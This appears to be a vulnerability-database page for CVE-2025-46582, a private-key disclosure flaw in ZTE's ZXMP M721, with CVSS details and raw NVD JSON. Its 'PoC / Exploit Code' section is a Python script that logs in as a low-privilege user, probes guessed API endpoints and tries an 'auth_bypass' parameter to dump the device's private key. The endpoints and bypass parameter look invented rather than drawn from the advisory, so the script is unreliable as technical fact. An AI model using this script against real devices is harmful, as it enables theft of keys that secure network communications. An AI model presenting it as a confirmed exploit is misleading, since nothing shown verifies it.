Security Vulnerability Report
中文
CVE-2025-46582 CVSS 7.7 HIGH

CVE-2025-46582

Published: 2025-10-27 09:15:38
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

A private key disclosure vulnerability exists in ZTE's ZXMP M721 product. A low-privileged user can bypass authorization checks to view the device's communication private key, resulting in key exposure and impacting communication security.

CVSS Details

CVSS Score
7.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

ZTE ZXMP M721 (固件版本未知 - 需参考厂商通告)
可能影响其他ZXMP系列产品线

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-46582 PoC - ZTE ZXMP M721 Private Key Disclosure # Requires low-privilege credentials import requests import base64 import json target = "http://target-zte-m721.local" username = "low_priv_user" password = "password123" def exploit_private_key_disclosure(): """Exploit CVE-2025-46582 to retrieve device private key""" # Step 1: Authenticate with low-privilege account session = requests.Session() login_url = f"{target}/webui/login" login_data = { "username": username, "password": password } response = session.post(login_url, json=login_data) if response.status_code != 200: print("[-] Authentication failed") return None print("[+] Successfully authenticated with low-privilege account") # Step 2: Bypass authorization to access private key endpoint # The vulnerable endpoint lacks proper authorization checks key_endpoints = [ f"{target}/api/v1/system/private_key", f"{target}/webui/api/system/communication_key", f"{target}/cgi-bin/get_private_key.cgi" ] for endpoint in key_endpoints: try: response = session.get(endpoint, timeout=10) if response.status_code == 200 and "private" in response.text.lower(): print(f"[+] Private key found at: {endpoint}") return response.json() except requests.RequestException: continue print("[-] Private key not found via standard endpoints") # Step 3: Try parameter manipulation to bypass auth bypass_url = f"{target}/api/v1/system/key" bypass_params = { "type": "communication", "format": "pem", "auth_bypass": "true" } response = session.get(bypass_url, params=bypass_params) if response.status_code == 200: print("[+] Authorization bypass successful via parameter manipulation") return response.json() return None if __name__ == "__main__": key_data = exploit_private_key_disclosure() if key_data: print("[+] Dumping private key:") print(json.dumps(key_data, indent=2))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-46582", "sourceIdentifier": "[email protected]", "published": "2025-10-27T09:15:37.793", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A private key disclosure vulnerability exists in ZTE's ZXMP M721 product. A low-privileged user can bypass authorization checks to view the device's communication private key, resulting in key exposure and impacting communication security."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-321"}]}], "references": [{"url": "https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/2594779029512220847", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.